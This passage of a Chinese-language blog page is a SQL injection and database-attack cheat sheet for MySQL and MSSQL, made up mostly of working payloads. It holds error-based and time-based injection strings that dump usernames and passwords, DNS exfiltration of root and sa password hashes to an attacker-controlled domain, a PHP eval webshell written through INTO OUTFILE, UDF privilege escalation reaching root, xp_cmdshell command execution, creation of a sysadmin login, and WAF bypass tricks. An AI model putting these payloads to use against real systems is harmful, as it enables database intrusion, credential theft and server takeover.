class="keyword">LIMIT</span> <span class="number">1</span>,<span class="number">1</span>),<span class="number">0x7170626271</span>)) <span class="keyword">AND</span> (<span class="string">'JonM'</span>=<span class="string">'JonM</span></div></pre></td></tr></table></figure></p><p>//cut string<br>SELECT MID(ColumnName, Start [, Length])<br>CAST(value as type);<br>CHAR<br>SIGNED<br>CONVERT(value, type);<br>LIMIT 18,1 //ahmad</p><p>left(‘ruo’,1) = ‘r’<br>substr(‘ruo’,1,1) = ‘r’<br>ascii(‘r’) = 114<br>mid(‘ruo’,1,1) = ‘r’</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div></pre></td><td class="code"><pre><div class="line">(<span class="keyword">SELECT</span> </div><div class="line"><span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(<span class="keyword">password</span> <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) </div><div class="line"><span class="keyword">FROM</span> MTN2012.<span class="string">`user`</span> <span class="keyword">LIMIT</span> <span class="number">3</span>,<span class="number">1</span>)</div><div class="line"></div><div class="line">lang=en<span class="string">') AND </span></div><div class="line"><span class="string">EXTRACTVALUE(4230,</span></div><div class="line"><span class="string">CONCAT(0x34,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,50) FROM MTN2012.user ORDER BY id LIMIT 18,1))</span></div><div class="line"><span class="string">)</span></div><div class="line"><span class="string">AND ('</span>JonM<span class="string">'='</span>JonM;</div><div class="line"></div><div class="line">en') AND EXTRACTVALUE(4230,CONCAT(0x5c,0x716b787871,(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(username <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) <span class="keyword">FROM</span> MTN2012.user <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>),<span class="number">0x7170626271</span>)) <span class="keyword">AND</span> (<span class="string">'JonM'</span>=<span class="string">'JonM;</span></div><div class="line"><span class="string">en'</span>) <span class="keyword">AND</span> EXTRACTVALUE(<span class="number">4230</span>,<span class="keyword">CONCAT</span>(<span class="number">0x34</span>,(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(username <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) <span class="keyword">FROM</span> MTN2012.user <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>))) <span class="keyword">AND</span> (<span class="string">'JonM'</span>=<span class="string">'JonM;</span></div><div class="line"><span class="string">en'</span>) <span class="keyword">AND</span> EXTRACTVALUE(<span class="number">1</span>,(<span class="keyword">select</span> username <span class="keyword">FROM</span> MTN2012.user <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>)) <span class="keyword">AND</span> (<span class="string">'JonM'</span>=<span class="string">'JonM;</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">where username = 0x6261626e73696969</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">098f6bcd4621d373cade4e832627b4f6</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">select * from t where name = '</span>c<span class="string">' </span></div><div class="line"><span class="string">and extractvalue(1, </span></div><div class="line"><span class="string">(SELECT string FROM t limit 1,1)</span></div><div class="line"><span class="string">)</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">select extractValue(1,(SELECT string FROM t limit 1,1))</span></div><div class="line"><span class="string">[Err] 1105 - XPATH syntax error: '</span>f6bcd4621d373cade4e832627b4f6<span class="string">'</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">select extractValue(1,(SELECT concat(":",string) FROM t limit 1,1))</span></div><div class="line"><span class="string">[Err] 1105 - XPATH syntax error: '</span>:<span class="number">098</span>f6bcd4621d373cade4e832627b4f<span class="string">'</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">floor</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">select * from t where name = '</span>c<span class="string">' </span></div><div class="line"><span class="string">-- and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) </span></div><div class="line"><span class="string">-- and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x74 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">/*</span></div><div class="line"><span class="string">and (select 1 from</span></div><div class="line"><span class="string">(</span></div><div class="line"><span class="string">select count(*),concat(</span></div><div class="line"><span class="string">(SELECT distinct concat(0x23,string) FROM t limit 2,1) -- #a:100684d61405e723#</span></div><div class="line"><span class="string">-- "hkruo"</span></div><div class="line"><span class="string">,floor(rand(0)*2))x from information_schema.tables group by x)a</span></div><div class="line"><span class="string">)</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">*/</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">and (select 1 from </span></div><div class="line"><span class="string">(</span></div><div class="line"><span class="string">select count(*),concat(</span></div><div class="line"><span class="string">(SELECT distinct concat(0x23,string) FROM t limit 2,1) -- #a:100684d61405e723#</span></div><div class="line"><span class="string">,floor(rand(0)*2))x </span></div><div class="line"><span class="string">from information_schema.tables group by x</span></div><div class="line"><span class="string">)b</span></div><div class="line"><span class="string">)</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">and (select 1 from </span></div><div class="line"><span class="string">(</span></div><div class="line"><span class="string">select count(*),concat(</span></div><div class="line"><span class="string">(SELECT distinct concat(0x23,password) FROM admin limit 2,1)</span></div><div class="line"><span class="string">,floor(rand(0)*2))x </span></div><div class="line"><span class="string">from information_schema.tables group by x</span></div><div class="line"><span class="string">)b</span></div><div class="line"><span class="string">)</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">en'</span>)+<span class="keyword">and</span>+(<span class="keyword">select</span> <span class="number">1</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">concat</span>((<span class="keyword">SELECT</span> <span class="keyword">distinct</span> <span class="keyword">concat</span>(<span class="number">0x23</span>,<span class="keyword">password</span>) <span class="keyword">FROM</span> <span class="keyword">admin</span> <span class="keyword">limit</span> <span class="number">2</span>,<span class="number">1</span>),<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x)b) <span class="keyword">and</span> (<span class="string">'JonM'</span>=<span class="string">'JonM</span></div></pre></td></tr></table></figure><h3 id="延时注入"><a href="#延时注入" class="headerlink" title="延时注入"></a>延时注入</h3><p>延时函数<br>Mysql BENCHMARK(100000,MD5(1)) or sleep(5)<br>Postgresql PG_SLEEP(5) OR GENERATE_SERIES(1,10000)<br>MSSQL WAITFOR DELAY ‘0:0:5’</p><p>查询延时<br>select * from test.t where name = ‘a’</p><p>Payload<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">' or If(substr('ruo',1,1) = 'r',sleep(5),0)</div><div class="line">' and if(true,sleep(5),0) # </div><div class="line">' union <span class="keyword">select</span> <span class="keyword">benchmark</span>(<span class="number">500000</span>,<span class="keyword">md5</span>(<span class="string">'test'</span>));</div></pre></td></tr></table></figure></p><h3 id="DNS传输数据"><a href="#DNS传输数据" class="headerlink" title="DNS传输数据"></a>DNS传输数据</h3><p>配置域名<br>A test 153.92.xxx.xxx<br>NS ns1 test.domainname.com</p><p>语句<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">SELECT</span> <span class="keyword">LOAD_FILE</span>(<span class="keyword">CONCAT</span>(<span class="string">'\\\\'</span>,(<span class="keyword">SELECT</span> <span class="keyword">password</span> <span class="keyword">FROM</span> mysql.user <span class="keyword">WHERE</span> <span class="keyword">user</span>=<span class="string">'root'</span> <span class="keyword">LIMIT</span> <span class="number">1</span>),<span class="string">'.ns1.domainname.com\\foo'</span>));</div></pre></td></tr></table></figure></p><p>测试<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">WHERE</span> <span class="string">`name`</span> = <span class="string">'a'</span> </div><div class="line"><span class="keyword">or</span> <span class="keyword">if</span>((<span class="keyword">SELECT</span> <span class="keyword">LOAD_FILE</span>(<span class="keyword">CONCAT</span>(<span class="string">'\\\\'</span>,(<span class="keyword">SELECT</span> <span class="keyword">hex</span>(<span class="keyword">user</span>())),<span class="string">'.ns1.domainname.com\\foo'</span>))),<span class="number">1</span>,<span class="number">1</span>)</div></pre></td></tr></table></figure></p><p>使用dnschef接收数据<br><code>[22:29:07] 61.139.113.158: proxying the response of type 'A' for 726F6F74406C6F63616C686F7374.ns1.domain.com</code></p><blockquote><p>Note</p><ol><li>考虑LOAD_FILE被禁用的情况</li><li>本地DNS无法解析</li></ol></blockquote><h3 id="文件操作"><a href="#文件操作" class="headerlink" title="文件操作"></a>文件操作</h3><blockquote><p>在写文件或是shell的时候可能有些引号导致出错,这里我们可以考虑将其转换成16进制写入。如果mysql配置了 –secure-file-priv 参数将限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()函数的使用。</p></blockquote><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line"><span class="comment">/* 写webshell */</span></div><div class="line"><span class="keyword">select</span> <span class="keyword">hex</span>(<span class="string">'<?php eval($_POST[ru0]);phpinfo();?>'</span>)</div><div class="line"><span class="keyword">select</span> <span class="number">0x3C3F706870206576616C28245F504F53545B7275305D293B706870696E666F28293B3F3E</span> <span class="keyword">into</span> <span class="keyword">outfile</span> <span class="string">'D:/r1.php'</span></div><div class="line"></div><div class="line"><span class="comment">/* 还原16进制数据/etc/passwd */</span></div><div class="line"><span class="keyword">select</span> <span class="keyword">unhex</span>(<span class="string">'2F6574632F706173737764'</span>);</div><div class="line"></div><div class="line"><span class="comment">/* 将16进制的数据保存到文本文件中 */</span></div><div class="line"><span class="keyword">select</span> <span class="keyword">hex</span>(<span class="keyword">load_file</span>(<span class="string">'D:/Test/setup.exe'</span>)) <span class="keyword">into</span> <span class="keyword">outfile</span> <span class="string">'D:/Test/hex16f.txt'</span>;</div><div class="line"></div><div class="line"><span class="comment">/* 导出为2进制文件 */</span></div><div class="line"><span class="keyword">select</span> <span class="number">0x4D5A90000300000004000000</span><span class="comment">/*16进制数据*/</span> <span class="keyword">into</span> <span class="keyword">dumpfile</span> <span class="string">'D:/Test/file.exe'</span>;</div></pre></td></tr></table></figure><blockquote><p>Note</p><ol><li>将原程序转换成16进制在写入文件的时候需要使用into dumpfile,不能使用into outfile。</li><li>导出时不要忘记字符串开头0x符号。</li></ol></blockquote><h3 id="UDF"><a href="#UDF" class="headerlink" title="UDF"></a>UDF</h3><p>Linux:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div></pre></td><td class="code"><pre><div class="line">$ id</div><div class="line">uid=500(raptor) gid=500(raptor) groups=500(raptor)</div><div class="line">$ gcc -g -c raptor_udf2.c</div><div class="line">$ gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc</div><div class="line">$ mysql -u root -p</div><div class="line">Enter password:</div><div class="line">[...]</div><div class="line">mysql> use mysql;</div><div class="line">mysql> create table foo(line blob);</div><div class="line">mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));</div><div class="line">mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';</div><div class="line">mysql> create function do_system returns integer soname 'raptor_udf2.so';</div><div class="line">mysql> select * from mysql.func;</div><div class="line">+-----------+-----+----------------+----------+</div><div class="line">| name | ret | dl | type |</div><div class="line">+-----------+-----+----------------+----------+</div><div class="line">| do_system | 2 | raptor_udf2.so | function |</div><div class="line">+-----------+-----+----------------+----------+</div><div class="line">mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');</div><div class="line">mysql> \! sh</div><div class="line">sh-2.05b$ cat /tmp/out</div><div class="line">uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)</div><div class="line">[...]</div></pre></td></tr></table></figure></p><p>Windows:</p><p>S1. 编译udf</p><p>udf源码<br><a href="http://www.mysqludf.org/" target="_blank" rel="external">http://www.mysqludf.org/</a><br><a href="https://github.com/sqlmapproject/udfhack" target="_blank" rel="external">https://github.com/sqlmapproject/udfhack</a></p><p>编译32位版本<br>MYSQL: 4.1.22<br>编译头文件: mysql-4.1.22-win32\include</p><p>将lib_mysqludf_sys.dll放入 c:\windows 目录内,高版本放到plugin目录(有bug,某些命令会导致MYSQL程序崩溃。)</p><blockquote><p>Important<br>udf文件存放路径和流类型创建plugin目录(select ‘xxx’ into dumpfile ‘C:\WINDOWS\TEMP\plugin::$INDEX_ALLOCATION’;)需对照目标版本针对性测试。</p></blockquote><p>S2. 创建函数</p><p>查看版本<br>select version();</p><p>查看plugin目录路径<br>SHOW VARIABLES LIKE ‘%plugin%’</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">mysql>use mysql;</div><div class="line">mysql>CREATE FUNCTION sys_exec RETURNS string SONAME <span class="string">'lib_mysqludf_sys.dll'</span>;</div><div class="line">mysql>SELECT * from mysql.func;</div><div class="line">+----------+-----+-----------------------+----------+</div><div class="line">| name | ret | dl | <span class="built_in">type</span> |</div><div class="line">+----------+-----+-----------------------+----------+</div><div class="line">| sys_exec | 0 | lib_mysqludf_sys1.dll | <span class="keyword">function</span> |</div><div class="line">+----------+-----+-----------------------+----------+</div><div class="line">mysql>SELECT sys_exec(<span class="string">'whoami > d:/11.txt'</span>);</div><div class="line">mysql>DROP FUNCTION sys_exec;</div></pre></td></tr></table></figure><h3 id="MYSQL-FEDERATED"><a href="#MYSQL-FEDERATED" class="headerlink" title="MYSQL FEDERATED"></a>MYSQL FEDERATED</h3><p>The FEDERATED storage engine lets you access data from a remote MySQL database without using replication or cluster technology.The FEDERATED storage engine is not enabled by default in the running server; to enable FEDERATED, you must start the MySQL server binary using the –federated option.</p><p><img src="https://i.imgur.com/gDDme2b.png" alt=""></p><p>Create FEDERATED Tables</p><p>ST1</p><ol><li>创建远程表<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">CREATE</span> <span class="keyword">TABLE</span> <span class="string">`T1`</span>(</div><div class="line"><span class="keyword">id</span> <span class="built_in">INT</span>(<span class="number">20</span>) <span class="keyword">NOT</span> <span class="literal">NULL</span> AUTO_INCREMENT,</div><div class="line"><span class="string">`name`</span> <span class="built_in">VARCHAR</span>(<span class="number">100</span>),</div><div class="line">PRIMARY <span class="keyword">KEY</span> (<span class="keyword">id</span>)</div><div class="line">)</div><div class="line"><span class="keyword">ENGINE</span>=MYISAM;</div></pre></td></tr></table></figure></li></ol><p>ST2</p><ol><li><p>在my.ini中开启federated存储引擎</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">[mysqld]</div><div class="line">federated</div></pre></td></tr></table></figure></li><li><p>使用 CONNECTION 创建 FEDERATED 表</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">CREATE</span> <span class="keyword">TABLE</span> <span class="string">`T1_FEDERATED`</span>(</div><div class="line"><span class="keyword">id</span> <span class="built_in">INT</span>(<span class="number">20</span>) <span class="keyword">NOT</span> <span class="literal">NULL</span> AUTO_INCREMENT,</div><div class="line"><span class="string">`name`</span> <span class="built_in">VARCHAR</span>(<span class="number">100</span>),</div><div class="line">PRIMARY <span class="keyword">KEY</span> (<span class="keyword">id</span>)</div><div class="line">)</div><div class="line"><span class="keyword">ENGINE</span>=FEDERATED</div><div class="line"><span class="keyword">CONNECTION</span>=<span class="string">'mysql://root:password@127.0.0.1:3306/test/T1'</span>;</div></pre></td></tr></table></figure></li></ol><blockquote><p>Note<br>The remote server must be a MySQL server.<br>Care should be taken when creating a FEDERATED table since the index definition from an equivalent MyISAM or other table may not be supported.</p></blockquote><p>How to attack?<br>在开启引擎的情况下可以通过其他用户访问本地其他表</p><h3 id="Restoring-Orphan-File-Per-Table-ibd-Files"><a href="#Restoring-Orphan-File-Per-Table-ibd-Files" class="headerlink" title="Restoring Orphan File-Per-Table ibd Files"></a>Restoring Orphan File-Per-Table ibd Files</h3><p>在有.frm和.ibd文件的时候(独立表空间,innodb_file_per_table=1)恢复数据库,首先确保当前数据库和待恢复数据库版本一致!</p><p>ST1</p><ol><li>获取表结构<br>建立同名数据库<br>mysql> CREATE DATABASE dbname;</li><li>将.frm文件拖入相应的数据库目录下</li><li>查看表结构<br>mysql> SHOW CREATE TABLE tbname;</li></ol><blockquote><p>Note<br>恢复表结构方式2(推荐使用)<br>MySQL Utilities<br><a href="https://dev.mysql.com/downloads/utilities/" target="_blank" rel="external">https://dev.mysql.com/downloads/utilities/</a><br>$ mysqlfrm –basedir=/usr/local/bin/mysql test1:db1.frm –port=3333</p></blockquote><p>ST2</p><ol><li>使用导出的语句创建表结构</li><li>分离当前表空间<br>mysql> ALTER TABLE dbname.tbname DISCARD TABLESPACE;</li><li>拷贝要恢复的.idb文件到新数据库目录下(在Linux下确保.ibd文件有合适的权限)</li><li>导入.ibd文件<br>mysql> ALTER TABLE dbname.tbname IMPORT TABLESPACE; SHOW WARNINGS; </li></ol><h3 id="绕过WAF"><a href="#绕过WAF" class="headerlink" title="绕过WAF"></a>绕过WAF</h3><p>WAF拦截流程<br>数据清洗 -> 规则匹配</p><p>大小写转换 union -> UnIon<br>删除型过滤 union -> unioUNIONn<br><> 等价于 BETWEEN<br>= 等价于 like<br>Hex() bin() 等价于ascii()<br>Sleep() 等价于 benchmark()<br>Mid()substring() 等价于 substr()<br>@@user 等价于 User()<br>@@Version 等价于 version()<br>mysql支持 &&,||<br><code>+ 加号当空格</code><br><code>/*Comments*/ 注释当空格</code><br><code>CONCAT/*Comments*/('a','test');</code> //函数名与左括号之间可以存在特殊字符<br><code>where name = 8E0union select 'test'</code> // 8.0union select ‘test’ 无法绕过正则匹配union\sselect<br><code>UNION/*!12345select all*/1,2</code> //union all select 1,2<br>?<br>` 起到注释<br>union%250Cselect %250C空白符<br>union%25A0select<br>mysql 忽略未知的编码</p><blockquote><p>Note<br>通过日志查看mysql语句执行情况<br>配置my.ini开启日志<br>[mysqld]<br>log = mysql.log<br>或者<br>set global general_log=1;</p></blockquote><h3 id="存储过程"><a href="#存储过程" class="headerlink" title="存储过程"></a>存储过程</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">use</span> <span class="keyword">test</span>;</div><div class="line"><span class="keyword">DROP</span> <span class="keyword">PROCEDURE</span> <span class="keyword">IF</span> <span class="keyword">EXISTS</span> <span class="keyword">test</span>;</div><div class="line"><span class="keyword">CREATE</span> <span class="keyword">PROCEDURE</span> <span class="keyword">test</span>()</div><div class="line"><span class="keyword">BEGIN</span></div><div class="line"><span class="keyword">DECLARE</span> i <span class="built_in">INT</span> <span class="keyword">DEFAULT</span> <span class="number">1</span>;</div><div class="line">#SET i=1;</div><div class="line">WHILE i < 3608 DO</div><div class="line">#CREATE TABLE ti(id int) ENGINE=InnoDB;</div><div class="line"><span class="keyword">set</span> @sql_create_table = <span class="keyword">concat</span>(<span class="string">'CREATE TABLE IF NOT EXISTS tb_'</span>,i,<span class="string">'(id int) ENGINE=InnoDB'</span>);</div><div class="line"><span class="keyword">PREPARE</span> sql_create_table <span class="keyword">FROM</span> @sql_create_table;</div><div class="line"><span class="keyword">EXECUTE</span> sql_create_table;</div><div class="line"><span class="keyword">SET</span> i=i+<span class="number">1</span>;</div><div class="line"><span class="keyword">END</span> <span class="keyword">WHILE</span>;</div><div class="line"><span class="keyword">END</span>;</div><div class="line"></div><div class="line"><span class="keyword">CALL</span> <span class="keyword">test</span>()</div></pre></td></tr></table></figure><h3 id="备份还原"><a href="#备份还原" class="headerlink" title="备份还原"></a>备份还原</h3><p>转储SQL文件</p><p>mysqldump -h ip -uroot -pPassword dbname table1 table2 > backup.sql</p><p>mysqlhotcopy</p><p>恢复</p><p>mysql -u root -pPassword dbname < backup.sql</p><blockquote><p>Note<br>如果出现语法错误等需设置最大数据包参数<br>mysql> set global max_allowed_packet=268435456;</p></blockquote><h2 id="MSSQL"><a href="#MSSQL" class="headerlink" title="MSSQL"></a>MSSQL</h2><h3 id="常用语句"><a href="#常用语句" class="headerlink" title="常用语句"></a>常用语句</h3><p>获取数据库文件路径</p><p><code>select database_id,name,physical_name AS CurrentLocation,state_desc,size from sys.master_files where database_id=db_id(N'wx');</code> </p><p>当前数据库名 db_name()<br>当前用户 user<br>服务器名 @@SERVERNAME</p><p>数据库名</p><p>select name from master.dbo.sysdatabases where dbid=1</p><p>查看表名</p><p>select top 1 name from 库名.dbo.sysobjects where xtype=’U’</p><p>查看表对应的id</p><p>select id from sl.dbo.sysobjects where xtype=’U’ and name=’users’</p><p>通过表id查询其列名</p><p>select name from sl.dbo.syscolumns where id=1937441976</p><p>添加角色</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">CREATE</span> LOGIN ruo <span class="keyword">WITH</span> <span class="keyword">PASSWORD</span> = <span class="string">'123456'</span>;</div><div class="line">EXEC sp_addsrvrolemember 'ruo', 'sysadmin'</div></pre></td></tr></table></figure><p>常用函数</p><p>COL_NAME ( table_id , column_id )<br>IS_SRVROLEMEMBER (‘sysadmin’)<br>IS_MEMBER (‘db_owner’)<br>EXISTS/NOT EXISTS<br>IN/ONT IN</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="comment">--遍历表名</span></div><div class="line"><span class="keyword">SELECT</span> TOP <span class="number">1</span> <span class="keyword">name</span> <span class="keyword">FROM</span> sl.dbo.sysobjects <span class="keyword">WHERE</span> xtype=<span class="string">'U'</span> </div><div class="line"><span class="keyword">AND</span> <span class="keyword">NAME</span> <span class="keyword">NOT</span> <span class="keyword">IN</span> (<span class="keyword">SELECT</span> TOP N <span class="keyword">NAME</span> <span class="keyword">FROM</span> sl.dbo.sysobjects <span class="keyword">WHERE</span> xtype=<span class="string">'U'</span>)</div></pre></td></tr></table></figure><p>将多行值转成一列<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line"><span class="comment">-- 获取表列名</span></div><div class="line"><span class="keyword">DECLARE</span> @<span class="keyword">col</span> <span class="built_in">varchar</span>(<span class="number">1000</span>)=<span class="string">''</span>;</div><div class="line"><span class="keyword">SELECT</span> @<span class="keyword">col</span> = @<span class="keyword">col</span> + <span class="keyword">name</span> + <span class="string">','</span> <span class="keyword">FROM</span> SysColumns <span class="keyword">WHERE</span> <span class="keyword">id</span>=Object_Id(<span class="string">'Users'</span>);</div><div class="line"><span class="comment">--PRINT RTRIM(@col);</span></div></pre></td></tr></table></figure></p><p>SELECT ‘,’+Name FROM SysColumns WHERE id=Object_Id(‘Users’) FOR XML PATH(‘’)</p><p>查看table表列名<br><code>SELECT COL_NAME(OBJECT_ID('table'), 1)</code></p><p>猜列值<br>ascii(substring(COL_NAME(OBJECT_ID(‘Users’),1),1,1)) > 0 // 第几个字段,第几个字母</p><p>UNICODE(SUBSTRING((SELECT%0a ISNULL(CAST(LTRIM(STR(LEN(COL_NAME(OBJECT_ID(‘table’),1)))) AS NVARCHAR(4000)),CHAR(32))),1,1))>48</p><h3 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">EXEC sp_configure '<span class="keyword">show</span> <span class="keyword">advanced</span> options<span class="string">',1 //允许修改高级参数</span></div><div class="line"><span class="string">EXEC sp_configure '</span>xp_cmdshell<span class="string">',1 //打开xp_cmdshell扩展</span></div><div class="line"><span class="string">EXEC master..dbo.xp_cmdshell '</span>whomai<span class="string">'</span></div></pre></td></tr></table></figure><h3 id="Public-权限列目录"><a href="#Public-权限列目录" class="headerlink" title="Public 权限列目录"></a>Public 权限列目录</h3><p>获取C:下目录名<br><code>EXEC master..xp_dirtree 'c:/',1</code></p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">IF OBJECT_ID('tempdb..##DirectoryTree') IS NOT NULL</div><div class="line"> <span class="keyword">DROP</span> <span class="keyword">TABLE</span> ##DirectoryTree;</div><div class="line"></div><div class="line"><span class="keyword">CREATE</span> <span class="keyword">TABLE</span> ##DirectoryTree (</div><div class="line"> <span class="keyword">id</span> <span class="built_in">int</span> <span class="keyword">IDENTITY</span>(<span class="number">1</span>,<span class="number">1</span>),</div><div class="line"> subdirectory <span class="keyword">nvarchar</span>(<span class="number">512</span>),</div><div class="line"> <span class="keyword">depth</span> <span class="built_in">int</span>,</div><div class="line"> isfile <span class="built_in">bit</span>);</div><div class="line"></div><div class="line"><span class="keyword">INSERT</span> ##DirectoryTree (subdirectory,<span class="keyword">depth</span>,isfile) EXEC master..xp_dirtree <span class="string">'c:/'</span>,<span class="number">1</span>,<span class="number">1</span>;</div></pre></td></tr></table></figure><p>DNS传输数据</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">DECLARE</span> @host <span class="built_in">varchar</span>(<span class="number">1024</span>);</div><div class="line"><span class="keyword">SELECT</span> @host=(<span class="keyword">SELECT</span> TOP <span class="number">1</span> master.dbo.fn_varbintohexstr(password_hash) <span class="keyword">FROM</span> sys.sql_logins <span class="keyword">WHERE</span> <span class="keyword">name</span>=<span class="string">'sa'</span>)+<span class="string">'.attacker.com'</span>;</div><div class="line">EXEC master..xp_dirtree "\\'+@host+'\foobar$";</div></pre></td></tr></table></figure><h3 id="备份数据库"><a href="#备份数据库" class="headerlink" title="备份数据库"></a>备份数据库</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">BACKUP</span> <span class="keyword">DATABASE</span> database_name </div><div class="line"> <span 